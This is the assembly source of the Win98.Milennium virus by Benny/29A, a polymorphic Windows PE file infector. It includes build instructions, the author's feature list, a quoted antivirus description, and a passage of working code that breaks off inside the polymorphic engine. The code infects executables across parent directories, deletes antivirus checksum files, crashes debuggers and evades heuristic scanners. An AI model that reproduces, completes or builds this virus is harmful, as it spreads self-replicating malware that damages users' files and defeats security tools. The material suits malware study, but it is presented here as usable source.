MalwareSourceCode/LegacyWindows/Win98/Win98.Milennium.asm
2020-10-16 22:28:58 +02:00

1538 lines
44 KiB
NASM

; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
; ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
; Win98.Milennium ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
; by Benny/29A ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
;
;
;
;Author's description
;=====================
;
;
;I'm very proud to introduce first multifiber virus ever. Not only this is
;also multithreaded polymorphic compressed armoured Win98 PE file infector
;with structure similar to neural nets. For those ppl, that doesn't know,
;what fiber is i can say: "There r many differences between threads and
;fibers, but this one is the most important. Threads r scheduled by
;specific Operating System's algorihtm, so its in 50% up to OS, which
;thread will run and which not. Fibers r special threads, that r scheduled
;ONLY by YOUR algorithm." I will explain all details in my tutorial.
;
;
;
;What happens on execution ?
;----------------------------
;
;Virus will:
;1) Decrypt it's body by polymorphic decryptor
;2) Decompress API strings
;3) Gets module handle of KERNEL32.DLL
;4) Gets addresses for all needed APIs
;5) Creates Main thread
; I) Converts actual thread to fiber
; II) Creates all needed fibers
; III) Finds file
; IV) Chex file
; V) Infects file
; VI) Loops III) - V)
; VII) Deletes TBAV checksum file
; VIII) Changes directory by dot-dot method
; IX) Loops III) - VII)
;
;6) Chex some flags (=> payload) and jumps to host program.
;
;
;
;Main features
;--------------
;
;Platforms: Win98+, platforms supportin' threads, fibers and "IN" instruction.
;Residency: Nope, direct action only.
;Stealth: No due to nonresidency.
;Antidebuggin': Yes, uses threads, fibers and IsDebuggerPresent API.
;Antiheuristix: Yes, uses threads, fibers and polymorphic engine.
;AntiAntiVirus: Yes, deletes TBAV checksum file.
;Fast infection:Yes, infects all files in directory structure.
;Polymorphism: Yes.
;Other features:a) Usin' "Memory-Mapped files".
; b) No use of absolute addresses.
; c) The only way, how to detect this virus is check PE header
; for suspicious flags (new section and flags in last section)
; or find decryption routine (that's not easy, it's polymorphic).
; It can't be detected by heuristic analyzer due to use of
; threads and fibers. AV scanner can't trace all APIs
; and can't know all of 'em. In this age. I think, this is
; the best antiheuristic technique.
; d) Usin' SEH for handlin' expected and unexpected exeptions.
; e) Infects EXE, SCR, BAK, DAT and SFX (WinRAR) files.
; f) Two ways, how to infect file: 1) append to last section
; 2) create new section
; g) Similar structure to Neural Nets.
; h) Unicode support for future versions of windozes
;
;
;
;Payload
;--------
;
;If virus is at least 50th generation of original, it displays
;in possibility 1:10 MessageBox.
;
;
;
;AVP's description
;==================
;
;This is not a dangerous parasitic Win98 direct action polymorphic virus. It
;uses several Windows APIs included only in Windows98 and WindowsNT 3.51
;Service Pack 3 or higher, and will not work under Windows95. Due to
;infection-related bugs, it also doesn't work under WinNT and Win2000. So it
;is Win98 specific virus. The infection mechanism used is a very tricky one -
;- and a very stable under Win98, too. It makes this virus a very fast
;infector, but several infection related bugs unhide the virus presence in
;non-Win98 systems. When executed, the virus searches for PE executable files
;in the current directory and all the upper directories. During infection the
;virus uses two infection ways: increases the size of last file section for
;its code, or adds a new section called ".mdata". At each 30 infected file the
;virus depending on the system timer (in one case of 10) displays the
;following message box:
;
; +---------------------------------------------------+
; | Win32.Milennium by Benny/29A |
; +---------------------------------------------------|
; | First multifiber virus is here, beware of me ;-) |
; | Click OK if u wanna run this shit..' |
; +---------------------------------------------------+
;
;
;Technical details
;------------------
;
;When an infected file is executed, the polymorphic routine will decrypt the
;constant virus body. Next, the virus unpacks the API names using the
;following scheme: each API name is split in words, each word that appears
;twice is stored in a dictionary (for example SetFileAttributes and
;GetFileAttributes APIs are encoded like this:
;
;Dictionary: Set, Get, File, Attributes
;Encoding: 1, 3, 4, 2, 3, 4.
;
;Any word that is not in the dictionary is stored "AS IS". After unpacking API
;names, it gets the addresses for all the used APIs. Then, it creates a thread
;and waits for it to finnish.
;
;
;The main thread and fibers
;---------------------------
;
;The thread converts itself to a fiber and split the infection process in 7
;pieces:
;
;Fiber 1 - gets the current directory and searches for the following file
;types: *.EXE, *.SCR, *.BAK, *.DAT, *.SFX. Then it gives control to fiber 3.
;After receiving back the control, it deletes the file (if any) ANTIVIR.DAT
;from the current directory and goes to the upper directory.
;
;Fiber 2 - checks if the code runs under a debugger and if yes, it makes the
;stack pointer zero. This will result in a debugger crash.
;
;Fiber 3 - gets a file from the current search started in Fiber 1 and calls
;Fiber 4 to continue. When Fiber4 is completed, it calls Fiber7 and waits to
;receive back the control. Then it checks for more files in the current
;directory.
;
;Fiber 4 - checks if the file size if less than 4Gb and then gives control to
;Fiber 5. After Fiber5 completes, it checks it the file is an exe file, if the
;target processor is Intel and if the file is not a DLL. Also, it pays
;attention to the Imagebase (only files with ImageBase = 400000h are infected
; - most applications are infectable from this point of view). Then it gives
;control to Fiber 6 and waits to receive it back.
;
;Fiber 5 - Opens the current file, creates a mapping object for this file to
;make infection process easier. Next, it calls Fiber6 and sleeps till it gets
;back the control.
;
;Fiber 6 - is closes the current file, restores the file time and date and, if
;needed, grows the current file to fit the virus code.
;
;Fiber 7 - it calls the main infection routine.
;
;
;File infection routine
;-----------------------
;
;When infecting a file, the virus scans its imports for one of the following
;APIs: GetModuleHandleA and GetModuleHandleW. This will be used by the virus
;to get the addresses of the APIs needed to spread. If the host file does not
;import one of the previous APIs, the virus will not infect it. Next, the
;virus adds its code - there's one chance in three to create a new section,
;called .mdata. Otherwise, it increases the size of the last section. Then it
;calls it's polymorphic engine to generate an encrypted image of the virus and
;the decryptor for it and writes generated code into the host file.
;
;
;
;Author's notes
;===============
;
;Hmmm, fine. Adrian Marinescu made excelent work. Really. I think, he didn't
;miss any important thing nor any internal detail. Gewd werk Adrian!
;Nevertheless, there is one thing, I have to note. Adrian made description of
;beta of Milennium. U can see, that payload writes Win32.Milennium instead
;Win98. That time I didn't tested it on WinNTs and I expected, it will be
;Win32 compatible. Unfortunately, I forgot, that IN is privileged opcode under
;WinNT (that's that bug, Adrian talked about). And after some other
;corrections (beta deleted ANTIVIR.DAT files instead ANTI-VIR.DAT), I started
;to call this virus Win98+ compatible. However, Adrians informators (or
;himself) probably never saw sharp version of Milennium. Hmm, maybe l8r. But
;this doesn't change anything on thing, that Adrian deeply analysed this virus
;and that he made really excelent work. I think its all.
;
;
;
;Greetz
;=======
;
; All 29Aers..... Thank ya for all! I promise, I'll do everything
; I can ever do for 29A.
; LethalMnd...... U have a potential, keep workin' on yourself!
; Yesnah......... Find another dolly, babe :-)).
; Adrian/GeCAD... Fuck off AV, join 29A! X-D
;
;
;
;How to build
;=============
;
; tasm32 -ml -q -m4 mil.asm
; tlink32 -Tpe -c -x -aa -r mil.obj,,, import32
; pewrsec.com mil.exe
;
;
;
;For who is this dedicated ?
;============================
;
;This virus is dedicated for somebody. Hehe, surprisely. It's dedicated to all
;good VXerz (N0T lamerz !!!) with greet, next Milennium will be our.
;Don't give up !!!
;
;
;
;(c) 1999 Benny/29A.
.386p ;386+ intructions
.model flat ;flat model
include MZ.inc ;include some needed files
include PE.inc
include Win32API.inc
include Useful.inc
extrn ExitProcess:PROC ;some APIs needed by first generation
extrn GetModuleHandleA:PROC
extrn GetModuleHandleW:PROC
.data
db ? ;for TLINK32 compatibility
ends
;VIRUS CODE STARTS HERE...
.code
Start:
pushad ;push all regs
@SEH_SetupFrame ;setup SEH frame
inc byte ptr [edx] ;===> GP fault
jmp Start ;some stuff for dumb emulators
seh_fn: @SEH_RemoveFrame ;remove SEH frame
popad ;and pop all regs
;stuff above will fuck AV-emulators
push eax ;leave some space for "ret" to host
pushad ;push all regs
;POLY DECRYPTOR STARTS HERE...
@j1: db 3 dup (90h)
call @j2
@j2: db 3 dup (90h)
@1: pop ebp
@j3: db 3 dup (90h)
@2: sub ebp, offset @j2
@j4: db 3 dup (90h)
; mov ecx, (virus_end-encrypted+3)/4
@4: db 10111001b
dd (virus_end-encrypted+3)/4
@j5: db 3 dup (90h)
; lea esi, [ebp + encrypted]
db 10001101b
@3: db 10110101b
; regmod
dd offset encrypted
@j6: db 3 dup (90h)
decrypt:
; xor dword ptr [esi], 0
db 10000001b
@7: db 00110110b
key: dd 0
@j7: db 3 dup (90h)
_next_: ; add esi, 4
db 10000011b
@8: db 11000110b
db 4
@j8: db 3 dup (90h)
; dec ecx
@5: db 01001001b
@j9: db 3 dup (90h)
; test ecx, ecx
db 10000101b
@6: db 11001001b
jne decrypt
encrypted:
nFile = 1 ;some constants for decompress stage
nGet = 2
nSet = 3
nModule = 4
nHandle = 5
nCreate = 6
nFind = 7
nClose = 8
nViewOf = 9
nCurrentDirectoryA= 10
nFiber = 11
nThread = 12
nDelete = 13
nLibrary = 14
numof_csz = 15 ;number of 'em
call skip_strings
cstringz:
;module names
cszKernel32 db 'KERNEL32', 0
cszKernel32W dw 'K','E','R','N','E','L','3','2', 0
cszUser32 db 'USER32', 0
;compressed API names
cszGetModuleHandleA db nGet, nModule, nHandle, 'A', 0
cszGetModuleHandleW db nGet, nModule, nHandle, 'W', 0
cszCreateThread db nCreate, nThread, 0
cszWaitForSingleObject db 'WaitForSingleObject', 0
cszCloseHandle db nClose, nHandle, 0
cszConvertThreadToFiber db 'Convert', nThread, 'To', nFiber, 0
cszCreateFiber db nCreate, nFiber, 0
cszSwitchToFiber db 'SwitchTo', nFiber, 0
cszDeleteFiber db nDelete, nFiber, 0
cszGetVersion db nGet, 'Version', 0
cszFindFirstFileA db nFind, 'First', nFile, 'A', 0
cszFindNextFileA db nFind, 'Next', nFile, 'A', 0
cszFindClose db nFind, nClose, 0
cszCreateFileA db nCreate, nFile, 'A', 0
cszCreateFileMappingA db nCreate, nFile, 'MappingA', 0
cszMapViewOfFile db 'Map', nViewOf, nFile, 0
cszUnmapViewOfFile db 'Unmap', nViewOf, nFile, 0
cszSetFileAttributesA db nSet, nFile, 'AttributesA', 0
cszSetFilePointer db nSet, nFile, 'Pointer', 0
cszSetEndOfFile db nSet, 'EndOf', nFile, 0
cszSetFileTime db nSet, nFile, 'Time', 0
cszGetCurrentDirectoryA db nGet, nCurrentDirectoryA, 0
cszSetCurrentDirectoryA db nSet, nCurrentDirectoryA, 0
cszDeleteFile db nDelete, nFile, 'A', 0
cszLoadLibraryA db 'Load', nLibrary, 'A', 0
cszFreeLibraryA db 'Free', nLibrary, 0
cszIsDebuggerPresent db 'IsDebuggerPresent', 0
db 0ffh
szMessageBoxA db 'MessageBoxA', 0
;strings for payload
szTitle db 'Win98.Milennium by Benny/29A', 0
szText db 'First multifiber virus is here, beware of me ! ;-)', 0dh
db 'Click OK if u wanna run this shit...', 0
skip_strings:
pop esi ;get relative delta offset
mov ebp, esi
sub ebp, offset cstringz
lea edi, [ebp + strings]
next_ch:lodsb ;decompressing stage
test al, al
je copy_b
cmp al, 0ffh
je end_unpacking
cmp al, numof_csz
jb packed
copy_b: stosb
jmp next_ch
packed: push esi
lea esi, [ebp + string_subs]
mov cl, 1
mov dl, al
lodsb
packed2:test al, al
je _inc_
packed3:cmp cl, dl
jne un_pck
p_cpy: stosb
lodsb
test al, al
jne p_cpy
pop esi
jmp next_ch
un_pck: lodsb
test al, al
jne packed3
_inc_: inc ecx
jmp un_pck
end_unpacking:
stosb ;store 0ffh byte
mov ecx, offset _GetModuleHandleA - 400000h ;some params
GMHA = dword ptr $ - 4
mov ebx, offset _GetModuleHandleW - 400000h
GMHW = dword ptr $ - 4
lea edx, [ebp + szKernel32]
lea esi, [ebp + szKernel32W]
call MyGetModuleHandle ;pseudo-neuron
jecxz error
xchg ebx, ecx
lea esi, [ebp + szAPIs] ;params for next
lea edi, [ebp + ddAPIs]
call MyGetProcAddress ;pseudo-neuron
jecxz error
xor eax, eax
lea edx, [ebp + dwThreadID]
push edx
push eax
push ebp
lea edx, [ebp + MainThread]
push edx
push eax
push eax
call [ebp + ddCreateThread] ;create main thread
mov ebx, eax ;wait for
xor eax, eax ;thread
dec eax ;signalization
push eax
push ebx
call [ebp + ddWaitForSingleObject] ;...
push ebx ;and close handle
call [ebp + ddCloseHandle] ;of main thread
call payload ;try payload
error: mov eax, [ebp + Entrypoint]
add eax, 400000h
mov [esp.cPushad], eax
popad
ret ;and jump to host
;-------------------------------------------------------------------------------
payload:
cmp byte ptr [ebp + GenerationCount], 30 ;30th generation ?
jne end_payload ;nope
in al, 40h
and al, 9d
jne end_payload ;chance 1:10
lea edx, [ebp + szUser32] ;yup, load library
push edx ;(USER32.DLL)
call [ebp + ddLoadLibraryA]
xchg eax, ecx
jecxz end_payload
xchg ecx, ebx
lea esi, [ebp + szMessageBoxA] ;get address of
call GetProcAddress ;MessageBoxA API
xchg eax, ecx ;error ?
jecxz end_payload ;...
push 1000h ;pass params
lea edx, [ebp + szTitle]
push edx
lea edx, [ebp + szText]
push edx
push 0
call ecx ;call API
push ebx
call [ebp + ddFreeLibraryA] ;and unload library
end_payload:
ret
;-------------------------------------------------------------------------------
MyGetModuleHandle Proc ;our GetModuleHandle function
jecxz try_GMHW ;try Unicode version
mov edi, 400000h
push edx
_GMH_: add ecx, edi
call [ecx]
xchg eax, ecx
er_GMH: ret
try_GMHW: ;Unicode version
mov ecx, ebx
jecxz er_GMH
push esi
jmp _GMH_
MyGetModuleHandle EndP
;-------------------------------------------------------------------------------
MyGetProcAddress Proc ;our GetProcAddress function
call GetProcAddress
test eax, eax ;error ?
je er_GPA
stosd ;store address
@endsz ;get next API name
cmp byte ptr [esi], 0ffh ;end of API names ?
jne MyGetProcAddress ;no, next API
ret ;yeah, quit
er_GPA: xor ecx, ecx
ret
GetProcAddress:
pushad
@SEH_SetupFrame
mov eax, ebx
add eax, [eax.MZ_lfanew]
mov ecx, [eax.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_Size]
jecxz Proc_Address_not_found
mov ebp, ebx
add ebp, [eax.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
push ecx
mov edx, ebx
add edx, [ebp.ED_AddressOfNames]
mov ecx, [ebp.ED_NumberOfNames]
xor eax, eax
Search_for_API_name:
mov edi, [esp + 16]
mov esi, ebx
add esi, [edx + eax * 4]
Next_Char_in_API_name:
cmpsb
jz Matched_char_in_API_name
inc eax
loop Search_for_API_name
pop eax
Proc_Address_not_found:
xor eax, eax
jmp end_GetProcAddress
Matched_char_in_API_name:
cmp byte ptr [esi-1], 0
jne Next_Char_in_API_name
pop ecx
mov edx, ebx
add edx, [ebp.ED_AddressOfOrdinals]
movzx eax, word ptr [edx + eax * 2]
Check_Index:
cmp eax, [ebp.ED_NumberOfFunctions]
jae Proc_Address_not_found
mov edx, ebx
add edx, [ebp.ED_AddressOfFunctions]
add ebx, [edx + eax * 4]
mov eax, ebx
sub ebx, ebp
cmp ebx, ecx
jb Proc_Address_not_found
end_GetProcAddress:
@SEH_RemoveFrame
mov [esp.Pushad_eax], eax
popad
ret
MyGetProcAddress EndP
;-------------------------------------------------------------------------------
GetProcAddressIT proc ;inputs: EAX - API name
; ECX - lptr to MZ header
; EDX - module name
;outputs: EAX - RVA pointer to IAT, 0 if error
pushad
xor eax, eax
push ebp
mov esi, [ecx.MZ_lfanew]
add esi, ecx
mov eax, [esi.NT_OptionalHeader.OH_DirectoryEntries.DE_Import.DD_VirtualAddress]
mov ebp, ecx
push ecx
movzx ecx, word ptr [esi.NT_FileHeader.FH_NumberOfSections]
movzx ebx, word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
lea ebx, [esi.NT_OptionalHeader + ebx]
scan_sections:
mov edx, [ebx.SH_VirtualAddress]
cmp edx, eax
je section_found
sub ebx, -IMAGE_SIZEOF_SECTION_HEADER
loop scan_sections
pop ecx
pop eax
jmp End_GetProcAddressIT2
section_found:
mov ebx, [ebx + 20]
add ebx, ebp
pop ecx
pop eax
test ebx, ebx
je End_GetProcAddressIT2
xor esi, esi
xor ebp, ebp
push esi
dec ebp
Get_DLL_Name:
pop esi
inc ebp
mov edi, [esp + 20]
mov ecx, [ebx.esi.ID_Name]
test ecx, ecx
je End_GetProcAddressIT2
sub ecx, edx
sub esi, -IMAGE_SIZEOF_IMPORT_DESCRIPTOR
push esi
lea esi, [ebx + ecx]
Next_Char_from_DLL:
lodsb
add al, -'.'
jz IT_nup
sub al, -'.' + 'a'
cmp al, 'z' - 'a' + 1
jae no_up
add al, -20h
no_up: sub al, -'a'
IT_nup: scasb
jne Get_DLL_Name
cmp byte ptr [edi-1], 0
jne Next_Char_from_DLL
Found_DLL_Name:
pop esi
imul eax, ebp, IMAGE_SIZEOF_IMPORT_DESCRIPTOR
mov ecx, [ebx + eax.ID_OriginalFirstThunk]
jecxz End_GetProcAddressIT2
sub ecx, edx
add ecx, ebx
xor esi, esi
Next_Imported_Name:
push esi
mov edi, [esp + 32]
mov esi, [ecx + esi]
test esi, esi
je End_GetProcAddressIT3
sub esi, edx
add esi, ebx
lodsw
next_char:
cmpsb
jne next_step
cmp byte ptr [esi-1], 0
je got_it
jmp next_char
next_step:
pop esi
sub esi, -4
jmp Next_Imported_Name
got_it: pop esi
imul ebp, IMAGE_SIZEOF_IMPORT_DESCRIPTOR
add ebx, ebp
mov eax, [ebx.ID_FirstThunk]
add eax, esi
mov [esp + 28], eax
jmp End_GetProcAddressIT
End_GetProcAddressIT3:
pop eax
End_GetProcAddressIT2:
n6: xor eax, eax
mov [esp.Pushad_eax], eax
End_GetProcAddressIT:
popad
ret
GetProcAddressIT EndP
;-------------------------------------------------------------------------------
; NOTE: Dendrit = Input, Axon = output, Synapse = jump link
;-------------------------------------------------------------------------------
MainThread Proc PASCAL delta_param:DWORD ;delta offset as dendrit
pushad ;store all regs
mov ebx, delta_param ;store delta offset
push 0
call [ebx + ddConvertThreadToFiber] ;convert thread to fiber
xchg eax, ecx
jecxz exit_main ;error ?
mov [ebx + pfMain], ecx ;store context
lea esi, [ebx + Neuron_Addresses] ;create all needed fibers
lea edi, [ebx + Fiber_Addresses+4]
mov ecx, num_of_neurons
init_neurons:
lodsd
push ecx
push ebx
add eax, ebx
push eax
push 0
call [ebx + ddCreateFiber] ;create fiber
pop ecx
test eax, eax
je exit_main
stosd
loop init_neurons
push [ebx + pfNeuron_Main]
call [ebx + ddSwitchToFiber] ;switch to main neuron
exit_main:
popad
ret
MainThread EndP
;-------------------------------------------------------------------------------
Neuron_Main Proc PASCAL delta_param:DWORD ;delta offset as dendrit
pushad ;store all regs
mov ebx, delta_param ;store delta offset
push [ebx + pfNeuron_Debugger]
call [ebx + ddSwitchToFiber] ;dwitch to neuron
lea edx, [ebx + CurDir]
push edx
push MAX_PATH
call [ebx + ddGetCurrentDirectoryA] ;store current directory
mov ecx, 20
path_walk:
push ecx
lea esi, [ebx + szExe] ;extension
mov ecx, num_of_exts
process_dir:
push ecx
mov [ebx + nfindfile_name], esi ;dendrit
mov [ebx + nFF_synapse], offset pfNeuron_Main ;build synapse
push [ebx + pfNeuron_FindFile]
call [ebx + ddSwitchToFiber] ;infect directory
@endsz
pop ecx
loop process_dir ;next extension
lea esi, [ebx + dtavTBAV]
push 0
push esi
call [ebx + ddSetFileAttributesA] ;blank file attributes
push esi
call [ebx + ddDeleteFileA] ;delete TBAV checksum file
lea edx, [ebx + dotdot]
push edx
call [ebx + ddSetCurrentDirectoryA] ;switch to subdirectory
pop ecx
loop path_walk
lea edx, [ebx + CurDir]
push edx
call [ebx + ddSetCurrentDirectoryA] ;switch back
push [ebx + pfMain]
call [ebx + ddSwitchToFiber] ;switch back to main fiber
popad
ret
Neuron_Main EndP
;-------------------------------------------------------------------------------
Neuron_Debugger Proc PASCAL delta_param:DWORD ;delta offset as dendrit
pushad ;store all regs
mov ebx, delta_param ;store delta offset
call [ebx + ddIsDebuggerPresent] ;is debugger present ?
xchg eax, ecx
jecxz end_debugger ;nope, jump to end
in al, 40h ;this will cause execution
xor esp, esp ;"xor esp, esp" under TD32
end_debugger:
push [ebx + pfNeuron_Main]
call [ebx + ddSwitchToFiber] ;jump back to main neuron
popad
ret
Neuron_Debugger EndP
;-------------------------------------------------------------------------------
Neuron_FindFile Proc PASCAL delta_param:DWORD ;delta offset as dendrit
n_findfile:
pushad ;save all regs
mov ebx, delta_param ;store delta offset
mov edx, 0 ;pointer to file name
nfindfile_name = dword ptr $ - 4 ;as dendrit
lea eax, [ebx + WFD] ;find first file
push eax
push edx
call [ebx + ddFindFirstFileA]
xchg eax, ecx
jecxz end_FindFile
mov [ebx + SearchHandle], ecx ;save search handle
checkfile:
mov [ebx + nCF_synapse], offset pfNeuron_FindFile ;build synapse
push [ebx + pfNeuron_CheckFile]
call [ebx + ddSwitchToFiber] ;and switch to neuron
xor eax, eax
cmp al, 0
nCheckFile_OK = byte ptr $ - 1 ;check Axon
je find_next_file ;check failed ?
mov [ebx + nIF_synapse], offset pfNeuron_FindFile ;build synapse
push [ebx + pfNeuron_InfectFile]
call [ebx + ddSwitchToFiber] ;and switch to neuron
find_next_file:
lea edx, [ebx + WFD]
push edx
push [ebx + SearchHandle]
call [ebx + ddFindNextFileA] ;find next file
test eax, eax
jne checkfile ;r there more files ?
push [ebx + SearchHandle]
call [ebx + ddFindClose] ;nope, close search handle
end_FindFile:
push [ebx + dwThreadID]
nFF_synapse = dword ptr $ - 4 ;jump to previous neuron
call [ebx + ddSwitchToFiber] ;(depends on synapse)
popad
jmp n_findfile
Neuron_FindFile EndP
;-------------------------------------------------------------------------------
Neuron_CheckFile Proc PASCAL delta_param:DWORD ;d-offset as dendrit
n_checkfile:
pushad ;store all regs
mov ebx, delta_param ;store delta offset
mov [ebx + nCheckFile_OK], 0
test [ebx + WFD.WFD_dwFileAttributes], FILE_ATTRIBUTE_DIRECTORY
jne end_checkfile ;discard directories
xor edx, edx
mov ecx, [ebx + WFD.WFD_nFileSizeHigh]
cmp ecx, edx
jne end_checkfile ;discard huge files
add dx, 4096
cmp [ebx + WFD.WFD_nFileSizeLow], edx
jb end_checkfile ;discard small files
mov [ebx + nopenfile_size], ecx ;dendrit
mov [ebx + nOF_synapse], offset pfNeuron_CheckFile ;build synapse
push [ebx + pfNeuron_OpenFile]
call [ebx + ddSwitchToFiber] ;switch to neuron
mov ecx, [ebx + lpFile]
jecxz end_checkfile ;mapped failed ?
mov dl, byte ptr [ecx.MZ_res2]
test dl, dl
jne end_check_close ;test "already infected" mark
mov edx, ecx
cmp word ptr [ecx], IMAGE_DOS_SIGNATURE ;must be MZ
jne end_check_close
mov ecx, [ecx.MZ_lfanew]
jecxz end_check_close
mov eax, [ebx + WFD.WFD_nFileSizeLow]
cmp eax, ecx
jb end_check_close ;must point inside file
add ecx, edx
cmp dword ptr [ecx], IMAGE_NT_SIGNATURE ;must be PE\0\0
jne end_check_close
cmp word ptr [ecx.NT_FileHeader.FH_Machine], IMAGE_FILE_MACHINE_I386
jne end_check_close ;must be 386+
test byte ptr [ecx.NT_FileHeader.FH_Characteristics], IMAGE_FILE_EXECUTABLE_IMAGE
je end_check_close
cmp [ecx.NT_OptionalHeader.OH_ImageBase], 400000h ;must be 0x400000
jne end_check_close
xor eax, eax
inc eax
mov [ebx + nCheckFile_OK], al ;axon
end_check_close:
cdq
inc edx
inc edx
mov [ebx + nclosefile_mode], dl ;dendrit
mov [ebx + nClF_synapse], offset pfNeuron_CheckFile
push [ebx + pfNeuron_CloseFile]
call [ebx + ddSwitchToFiber] ;switch to neuron
end_checkfile:
push [ebx + dwThreadID]
nCF_synapse = dword ptr $ - 4
call [ebx + ddSwitchToFiber] ;jump to previous neuron
popad
jmp n_checkfile
Neuron_CheckFile EndP
;-------------------------------------------------------------------------------
Neuron_OpenFile Proc PASCAL delta_param:DWORD ;delta offset as dendrit
n_openfile:
pushad ;store all regs
mov ebx, delta_param ;store delta offset
lea esi, [ebx + WFD.WFD_szFileName]
mov edi, 0
nopenfile_size = dword ptr $ - 4 ;dendrit
xor eax, eax
mov [ebx + lpFile], eax
push eax
push eax
push OPEN_EXISTING
push eax
mov al, 1
push eax
ror eax, 1
mov ecx, edi
jecxz $ + 4
rcr eax, 1
push eax
push esi
call [ebx + ddCreateFileA] ;open file
inc eax
je end_OpenFile
dec eax
mov [ebx + hFile], eax
cdq
push edx
push edi
push edx
mov dl, PAGE_READONLY
test edi, edi
je $ + 4
shl dl, 1
push edx
push 0
push eax
call [ebx + ddCreateFileMappingA] ;create mappin object
test eax, eax
je end_OpenFile2
mov [ebx + hMapFile], eax
cdq
push edi
push edx
push edx
mov dl, FILE_MAP_READ
test edi, edi
je $ + 4
shr dl, 1
push edx
push eax
call [ebx + ddMapViewOfFile] ;map view of file
mov [ebx + lpFile], eax
test eax, eax
jne end_OpenFile
end_OpenFile3:
inc eax
end_OpenFile2:
mov [ebx + nclosefile_mode], al ;axon
mov eax, [nOF_synapse]
mov [ebx + nClF_synapse], eax ;dendrit
push [ebx + pfNeuron_CloseFile]
call [ebx + ddSwitchToFiber] ;switch to neuron
end_OpenFile:
push [ebx + dwThreadID]
nOF_synapse = dword ptr $ - 4
call [ebx + ddSwitchToFiber] ;switch to previous neuron
popad
jmp n_openfile
Neuron_OpenFile EndP
;-------------------------------------------------------------------------------
Neuron_CloseFile Proc PASCAL delta_param:DWORD
;delta offset as dendrit
n_closefile:
pushad ;store all regs
mov ebx, delta_param ;store delta offset
mov esi, [ebx + hFile]
xor edi, edi
xor ecx, ecx
mov cl, 0
nclosefile_mode = byte ptr $ - 1 ;dendrit
jecxz closefile
cmp cl, 1
je closemap
cmp cl, 2
je unmapfile
cmp al, 3
je next_edi
inc edi
next_edi:
inc edi
unmapfile:
push [ebx + lpFile]
call [ebx + ddUnmapViewOfFile] ;unmap view of file
closemap:
push [ebx + hMapFile]
call [ebx + ddCloseHandle] ;close mappin object
test edi, edi
je closefile
cmp edi, 1
je set_time
xor eax, eax
push eax
push eax
push [ebx + WFD.WFD_nFileSizeLow]
push esi
call [ebx + ddSetFilePointer] ;set file pointer API
push esi
call [ebx + ddSetEndOfFile] ;set EOF
set_time:
lea eax, [ebx + WFD.WFD_ftLastWriteTime]
push eax
lea eax, [ebx + WFD.WFD_ftLastAccessTime]
push eax
lea eax, [ebx + WFD.WFD_ftCreationTime]
push eax
push esi
call [ebx + ddSetFileTime] ;set back file time
closefile:
push [ebx + hFile]
call [ebx + ddCloseHandle] ;close file
push [ebx + dwThreadID]
nClF_synapse = dword ptr $ - 4
call [ebx + ddSwitchToFiber] ;jump to previous neuron
popad
jmp n_closefile
Neuron_CloseFile EndP
;-------------------------------------------------------------------------------
Neuron_InfectFile Proc PASCAL delta_param:DWORD
;delta offset as dendrit
n_infectfile:
pushad ;store all regs
mov ebx, delta_param ;store delta offset
@SEH_SetupFrame ;setup SEH frame
xor esi, esi
push esi
lea edi, [ebx + WFD.WFD_szFileName]
push edi
call [ebx + ddSetFileAttributesA] ;blank file attributes
test eax, eax
je end_InfectFile
mov eax, [ebx + WFD.WFD_nFileSizeLow]
sub eax, Start - virus_end
mov [ebx + nopenfile_size], eax ;dendrit
mov [ebx + nOF_synapse], offset pfNeuron_InfectFile ;synapse
push [ebx + pfNeuron_OpenFile]
call [ebx + ddSwitchToFiber] ;switch to neuron
mov ecx, [ebx + lpFile]
test ecx, ecx
je err_InfectFile
lea eax, [ebx + szGetModuleHandleA]
lea edx, [ebx + szKernel32]
call GetProcAddressIT ;imports GetModuleHandleA ?
test eax, eax
jne store
lea eax, [ebx + szGetModuleHandleW] ;nope, must import Unicode
call GetProcAddressIT ;version of that
test eax, eax
je err_InfectFile
mov [ebx + GMHW], eax
xor eax, eax
store: mov [ebx + GMHA], eax
push ecx
add ecx, [ecx.MZ_lfanew]
mov edx, ecx
x = IMAGE_SIZEOF_SECTION_HEADER
movzx esi, word ptr [edx.NT_FileHeader.FH_SizeOfOptionalHeader]
lea esi, [edx.NT_OptionalHeader + esi]
movzx eax, word ptr [edx.NT_FileHeader.FH_NumberOfSections]
test eax, eax
je err_InfectFile
imul eax, x
add esi, eax
in al, 40h ;select how to infect file
and al, 2
je NextWayOfInfection
push [esi.SH_SizeOfRawData - x]
lea edi, [esi.SH_VirtualSize - x]
sub dword ptr [edi], Start - virtual_end ;new virtual size
mov eax, [edi]
push edx
mov ecx, [edx.NT_OptionalHeader.OH_FileAlignment]
cdq
div ecx
inc eax
mul ecx
mov [esi.SH_SizeOfRawData - x], eax ;new SizeOfRawData
mov ecx, eax
pop edx
mov eax, [ebx + Entrypoint]
push [edx.NT_OptionalHeader.OH_AddressOfEntryPoint]
pop [ebx + Entrypoint]
pop edi
push eax
sub ecx, edi
add [edx.NT_OptionalHeader.OH_SizeOfImage], ecx ;new SizeOfImage
or [esi.SH_Characteristics.hiw.hib - x], 0e0h ;change flags
mov eax, [esi.SH_PointerToRawData - x]
add eax, edi
mov ecx, [ebx + WFD.WFD_nFileSizeLow]
add edi, ecx
sub edi, eax
mov esi, [esi.SH_VirtualAddress - x]
add esi, edi
mov [edx.NT_OptionalHeader.OH_AddressOfEntryPoint], esi ;new EP
pop eax
copy_virus:
pop edi
mov byte ptr [edi.MZ_res2], 1 ;set "already infected" mark
add edi, ecx
pushad ;POLY ENGINE STARTS HERE...
rep_1: call get_reg ;load random register
mov dl, al
add al, 58h ;create POP reg
mov byte ptr [ebx + @1], al ;store it
lea edi, [ebx + @2+1] ;and aply registry changes
call mask_it ;to all needed
lea edi, [ebx + @3] ;instructions
call mask_it ;...
rep_2: call get_reg ;get random register
cmp al, dl ;mustnt be previous register
je rep_2
mov dh, al
xchg dl, dh
add al, 0b8h ;create MOV instruction
mov byte ptr [ebx + @4], al ;store it
lea edi, [ebx + @5] ;and aply changes
call mask_it
push eax
